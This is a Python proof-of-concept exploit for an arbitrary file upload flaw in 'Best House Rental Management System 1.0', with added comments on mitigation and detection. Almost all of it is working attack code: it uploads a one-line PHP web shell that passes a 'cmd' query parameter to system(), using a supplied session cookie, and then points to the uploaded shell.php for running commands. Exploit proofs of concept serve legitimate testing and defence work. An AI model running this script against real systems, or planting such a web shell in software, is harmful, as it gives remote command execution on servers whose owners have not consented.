POC / exploit_house_rental.py PY
import requests
import sys

# Proof-of-concept for the arbitrary file upload issue in "Best House Rental
# Management System 1.0" (product and issue as named in the banner below).
# Weakness class: unrestricted upload of a file with a dangerous type (CWE-434).
#
# Defender notes:
#   * Mitigation: allowlist upload extensions server-side, store uploads under
#     server-generated names outside the document root, and disable script
#     execution in the upload directory.
#   * Detection: multipart POSTs carrying a ``.php`` filename, new ``.php``
#     files appearing in the upload directory, and requests to uploaded files
#     that carry a ``cmd`` query parameter.

# Exactly three positional arguments are required; anything else prints the
# usage line and exits with status 1.
if not len(sys.argv) == 4:
    print("Usage: python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>")
    sys.exit(1)

# target_url:  endpoint that receives the upload,
#              e.g. http://<target-site>/rental/admin_class.php?view=save_settings
# upload_path: location the uploaded file is expected to be served from
target_url, upload_path = sys.argv[1:3]

# The third argument (e.g. SESSION_ID=your_session_cookie) is wrapped in a
# one-entry dict under the key "Cookie".
# NOTE(review): a session value passed on the command line ends up in shell
# history and process listings; use a throwaway test-lab session only.
session_cookie = dict(Cookie=sys.argv[3])

print("""
Developed by Vidura Ranathunga
====================================================================
[!] Exploiting Best House Rental Management System 1.0 - Arbitrary File Upload Vulnerability
====================================================================
""")

# Upload content: a one-line PHP script that hands the ``cmd`` query parameter
# to system(). If the server stores it where PHP is executed, a request to that
# file runs the parameter as an OS command, so a stored copy of this file is an
# indicator of compromise.
shell_payload = '<?php system($_GET["cmd"]); ?>'

def upload_shell(url, upload_path, session_cookie, payload):
    """POST *payload* as a multipart ``file`` part named ``shell.php`` and print the outcome.

    Args:
        url: Endpoint that receives the multipart POST.
        upload_path: Only interpolated into the printed hint; it is never
            sent to the server.
        session_cookie: Mapping handed to ``requests.post`` as ``cookies=``.
        payload: Content of the uploaded ``file`` part.

    Returns:
        None. Status code, response body and any error are printed.

    Notes:
        HTTP 200 only selects the "may have been successful" message. The
        function never checks that the file was stored or is reachable, so a
        200 is not proof that the target is vulnerable.

        For defenders: both the filename (``shell.php``) and the declared
        content type (``application/x-php``) are chosen by the client, so
        neither can be trusted as an upload control. Validate the extension
        and content server-side and keep uploads out of any directory where
        scripts execute.
    """
    # (filename, content, content-type) tuple for the multipart field "file".
    multipart = {'file': ('shell.php', payload, 'application/x-php')}

    try:
        resp = requests.post(url, files=multipart, cookies=session_cookie)
        status = resp.status_code
        print("Response Status Code:", status)
        print("Response Text:", resp.text)

        if status != 200:
            print(f"Exploit failed with status code: {status}")
        else:
            # A 200 means the request was answered, not that the file landed.
            print(f"Exploit may have been successful. Check your shell at {upload_path}/shell.php?cmd=whoami")
    except Exception as err:
        # Best-effort script: any failure (network or otherwise) is reported, not raised.
        print("An error occurred:", err)

if __name__ == "__main__":
    # Echo the run parameters before sending anything.
    # NOTE(review): the banner prints the session cookie value verbatim, so
    # keep this output out of shared terminals, CI logs and tickets.
    run_banner = f"""
    ============================================================
                      [!] House Rental Exploit
    -----------------------------------------------------------
    [*] Target URL: {target_url}
    [*] Upload Path: {upload_path}
    [*] Session Cookie: {session_cookie}
    """
    print(run_banner)

    # Single upload attempt; upload_shell prints the result and returns None.
    upload_shell(
        url=target_url,
        upload_path=upload_path,
        session_cookie=session_cookie,
        payload=shell_payload,
    )